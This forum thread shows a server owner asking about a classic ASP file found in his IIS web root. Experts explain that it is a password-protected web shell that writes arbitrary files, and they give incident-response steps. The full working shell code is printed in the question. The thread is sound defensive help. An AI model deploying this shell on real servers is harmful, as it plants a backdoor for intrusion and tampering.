Solved

iis hack - can someone help deciper this text file left on my server ?

Posted on 2013-01-15
7
447 Views
Last Modified: 2013-01-16
I recently noticed a text file on my server. I'm having trouble deciphering it, and deciding my next steps.  I see no other files changed or added at that time.  Advice appreciated.

The .txt file is attached and code is below:

<%
on error resume next
%>
<%
if request("pass")="hack" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='Go!'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="success"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="wenjianlujing:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="xitong:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEBFWQ:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="IP:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>
test.txt
0
Comment
Question by:drelinger
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
  • 2
  • 2
  • +1
7 Comments
 
LVL 50

Expert Comment

by:Steve Bink
ID: 38781228
The file looks for a form submission with a field named "pass".  If the "pass" field equals the string "hack", a session variable is set to "go".

Then it looks at the session variable.  If it is not "go", the script renders an HTML form to the user, including the "pass" field.

If the session variable is go, the script displays a different form.  The form includes some server-side information (script name, OS, etc.), a textbox named "path", and a textarea field named "da".  If this form is submitted (assuming the password check passed earlier), the contents of the field "da" from this form submission are written to the file specified in the field "path".  If the file specified in "path" already exists, it is overwritten.

This script is used to place arbitrary files on your server.  Theoretically, it could even be used to write executable files.  The scripts ability to access protected areas will be determined by the security token of the user running IIS (generally, an IUSR_* account).  If you found this file on your server, it is very possible that you have other vulnerabilities or exploits installed, and that your server is currently being used to target your site's visitors for unpleasantness.
0
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38781246
Where was this file located?
0
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 38781402
I agree with @routinet, it is a classic ASP file/program to write files on your server.
0
Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 

Author Comment

by:drelinger
ID: 38782803
file was located in website root directory. There are no other file changes at that specific time.
Can anyone suggest further steps I should take having found this file ?
0
 
LVL 50

Accepted Solution

by:
Steve Bink earned 500 total points
ID: 38782922
That really depends on how paranoid you want to be.

In my world, the server would be wiped ASAP, with all services moved to a replacement until such time as it was ready to resume service.  It wouldn't be long, since the server would be restored in full from the latest backup...you do have backups, right?

At the very least, you should begin by doing a code audit for any sites on the server.  The fact that they have access to write arbitrary files means they could theoretically write files and manipulate the meta data.  In other words, just because a file looks like it hasn't been modified, does not mean it is not modified.  One popular target is to inject obfuscated javascript just after the open body tag in HTML files.

And, of course, you need to audit the server itself.  Find out what services/DLLs/extensions are running on boot, and if they're supposed to be there.  It could have a back-door installed, or some other less-visible application designed to tamper with the network communications.

If you do nothing else, you'll need to find how that file got on the server, and close that door.  IME, most of these hacks are the result of brute-forced/dictionary'd FTP or publishing services.  Disable FrontPage/WebDAV extensions.  Force all FTP users to change their passwords, and enforce a level of password complexity.  Above all, audit the security of all user accounts associated with your web service in any way, including the system accounts.  Make sure they have the permissions they need, and nothing more.

The good news is that most incidents like this (again, IME) are drive-by attacks...fire and forget.  They find a vulnerable site (as opposed to targeting the server itself), drop some stealthy javascript redirects, and move on.  If you're on shared hosting, that is probably all it is.  If you host your own server, it is more likely to have been targeted instead of the site, but that pattern still fits.
0
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38784322
Just to be sure, I would also run a reliable anti-spyware product like Malware Antibytes
0
 

Author Closing Comment

by:drelinger
ID: 38784446
Great advice. thank you very much.
0

Featured Post

Free Tool: Path Explorer

An intuitive utility to help find the CSS path to UI elements on a webpage. These paths are used frequently in a variety of front-end development and QA automation tasks.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

What is an ISAPI filter?   •      It's an assembly (.dll file) that can add or change the way IIS works.   •      They can be enabled globally for your web server or on a site-by-site basis.   When the IIS server receives a request, enabling the ISAPI fi…
When it comes to showing a 404 error page to your visitors, you do not want that generic page to show, and you especially do not want your hosting provider’s ad error page to show either. In this article, I will show you how to enable the custom 40…
With Secure Portal Encryption, the recipient is sent a link to their email address directing them to the email laundry delivery page. From there, the recipient will be required to enter a user name and password to enter the page. Once the recipient …

738 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question